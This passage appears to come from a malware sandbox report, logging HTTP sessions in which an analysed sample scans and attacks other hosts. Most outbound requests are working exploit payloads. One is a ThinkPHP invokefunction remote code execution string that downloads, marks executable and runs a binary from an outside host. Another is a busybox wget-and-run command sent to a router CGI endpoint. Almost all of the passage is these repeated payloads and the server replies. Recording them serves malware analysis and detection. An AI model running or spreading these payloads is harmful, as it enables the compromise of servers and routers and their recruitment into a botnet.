                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.024641037 CET251INHTTP/1.0 307 Temporary Redirect
                                                      Content-Length: 0
                                                      Content-Type: text/html
                                                      Date: Tue, 26 Dec 2023 00:34:18 GMT
                                                      Expires: Tue, 26 Dec 2023 00:34:18 GMT
                                                      Server: Mikrotik HttpProxy
                                                      Connection: close
                                                      Location: http://paynet.ge/suspend


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      649192.168.2.1551350119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.908102036 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:54Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      650192.168.2.155692688.82.219.21680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.040725946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      651192.168.2.1551466119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.189205885 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:55Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      652192.168.2.153339895.100.231.12380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.256489038 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:24.466244936 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 61 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 33 36 37 65 63 31 30 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4a7e19b8&#46;1707899424&#46;367ec10e</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      653192.168.2.154238695.100.226.5280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.466281891 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:24.675966024 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 61 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 33 36 37 65 63 31 62 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4a7e19b8&#46;1707899424&#46;367ec1be</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      654192.168.2.155920495.68.46.23480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.482803106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:25.253091097 CET64INHTTP/1.1 400 Bad Request
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      655192.168.2.154986295.58.114.13980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.552038908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:24.848285913 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:30:24.848459959 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      656192.168.2.155183295.217.161.16980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.692626953 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:24.919362068 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.16.1
                                                      Date: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      657192.168.2.154231095.101.41.16880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.695697069 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:24.925540924 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 36 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 34 33 65 32 62 32 32 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a6c91002&#46;1707899424&#46;43e2b223</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      658192.168.2.154897695.101.14.3780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.696063042 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:24.926254034 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:24 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 65 64 66 33 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 61 35 31 66 66 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4edf3a17&#46;1707899424&#46;a51ff01</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      659192.168.2.153925895.78.232.11380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.712097883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      660192.168.2.155063295.0.142.18880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.714668036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:26.008598089 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:27.512422085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:30.552450895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:36.696161032 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:48.727955103 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:14.071094036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:32:03.222058058 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      661192.168.2.154755295.86.82.180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.722511053 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      662192.168.2.153956295.58.54.9280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.760817051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:25.056052923 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:30:25.056351900 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      663192.168.2.1551490119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:24.936172009 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:55Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      664192.168.2.153525062.171.136.748080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.266149998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:25.475511074 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:25 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      665192.168.2.155053294.120.215.198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.304311037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      666192.168.2.154066431.200.111.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.304552078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      667192.168.2.155564094.120.60.198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:25.304657936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
